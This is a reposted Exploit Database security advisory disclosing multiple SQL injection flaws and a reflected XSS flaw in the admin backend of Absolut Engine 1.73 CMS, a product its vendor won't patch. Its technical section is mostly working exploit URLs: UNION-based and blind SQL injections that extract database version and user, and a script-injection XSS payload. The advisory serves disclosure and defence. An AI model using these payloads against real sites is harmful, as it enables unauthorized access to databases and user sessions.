Absolut Engine 1.73 – Multiple Vulnerabilities

• Exploit Database
• 19 阅读

• 作者： Steffen Rösemann
  日期： 2015-01-01
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/35670/

• Advisory: Multiple SQL Injections and Reflecting XSS in Absolut Engine v.1.73 CMS
  
  Advisory ID: SROEADV-2014-08
  
  Author: Steffen Rösemann
  
  Affected Software: CMS Absolut Engine v. 1.73
  
  Vendor URL: http://www.absolutengine.com/
  
  Vendor Status: solved
  
  CVE-ID: -
  
  
   ==========================
  
  Vulnerability Description:
  
  ==========================
  
  
   The (not actively developed) CMS Absolut Engine v. 1.73 has multiple SQL
  injection vulnerabilities and a XSS vulnerability in its administrative
  backend.
  
  
   ==================
  
  Technical Details:
  
  ==================
  
  
   The following PHP-Scripts are prone to SQL injections:
  
  
   *managersection.php (via sectionID parameter):*
  
  
  
  *http://{TARGET}/admin/managersection.php?&username=admin&session=c8d7ebc95b9b1a72d3b54eb59bea56c7&sectionID=1*
  
  
   *Exploit Example:*
  
  
  
  *http://{TARGET}/admin/managersection.php?&username=admin&session=c8d7ebc95b9b1a72d3b54eb59bea56c7&sectionID=1%27+and+1=2+union+select+1,version%28%29,3,4,5,6+--+*
  
  
   *edituser.php (via userID parameter):*
  
  
  
  *http://{TARGET}/admin/edituser.php?username=admin&session=c8d7ebc95b9b1a72d3b54eb59bea56c7&userID=3*
  
  
   *Exploit Example:*
  
  
  
  *http://{TARGET}/admin/edituser.php?username=admin&session=c8d7ebc95b9b1a72d3b54eb59bea56c7&userID=3%27+and+1=2+union+select+1,user%28%29,3,version%28%29,5,database%28%29,7,8,9+--+*
  
  
  
   *admin.php (via username parameter, BlindSQLInjection):*
  
  
  
  *http://{TARGET}/admin/admin.php?username=admin&session=c8d7ebc95b9b1a72d3b54eb59bea56c7*
  
  
   *Exploit Example:*
  
  
  
  *http://{TARGET}/admin/admin.php?username=admin%27+and+substring%28user%28%29,1,4%29=%27root%27+--+&session=c8d7ebc95b9b1a72d3b54eb59bea56c7*
  
  
   *managerrelated.php (via title parameter):*
  
  
   *http://{TARGET}/admin/managerrelated.php?username=user&session=ae29000d8570273c8917e874d029b336&articleID=0&title
  <http://localhost/absolut/admin/managerrelated.php?username=user&session=ae29000d8570273c8917e874d029b336&articleID=0&title>={some_title}*
  
  
   *Exploit Example:*
  
  
  
  *http://{TARGET}/admin/managerrelated.php?username=user&session=ae29000d8570273c8917e874d029b336&articleID=0&title={some_title}%27+and+1=2+union+select+1,version%28%29,3,4,5,6,7,8,9,10,11,12+--+*
  
  
   The last PHP-Script is as well vulnerable to a Reflecting XSS
  vulnerability.
  
  
   *Exploit Example:*
  
  
  
  *http://{TARGET}/admin/managerrelated.php?username=user&session=ae29000d8570273c8917e874d029b336&articleID=0&title=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E*
  
  
   Although this is a product which is not actively developed anymore, I
  think it is worth mentioning as the idea (of the lists) are to keep
  tracking (unknown) vulnerabilities in software products (but that is a
  personally point of view).
  
  
   Moreover, this product is still in use by some sites (!) and it is offered
  without a hint of its status.
  
  
   =========
  
  Solution:
  
  =========
  
  
   As the CMS is not actively developed, it shouldn't be used anymore.
  
  
   ====================
  
  Disclosure Timeline:
  
  ====================
  
  29-Dec-2014 – found the vulnerability
  
  29-Dec-2014 - informed the developers
  
  29-Dec-2014 – release date of this security advisory [without technical
  details]
  
  30-Dec-2014 – Vendor responded, won't patch vulnerabilities
  
  30-Dec-2014 – release date of this security advisory
  
  30-Dec-2014 – post on FullDisclosure
  
  
  
   ========
  
  Credits:
  
  ========
  
  
   Vulnerability found and advisory written by Steffen Rösemann.
  
  
   ===========
  
  References:
  
  ===========
  
  
   http://www.absolutengine.com/
  
  http://sroesemann.blogspot.de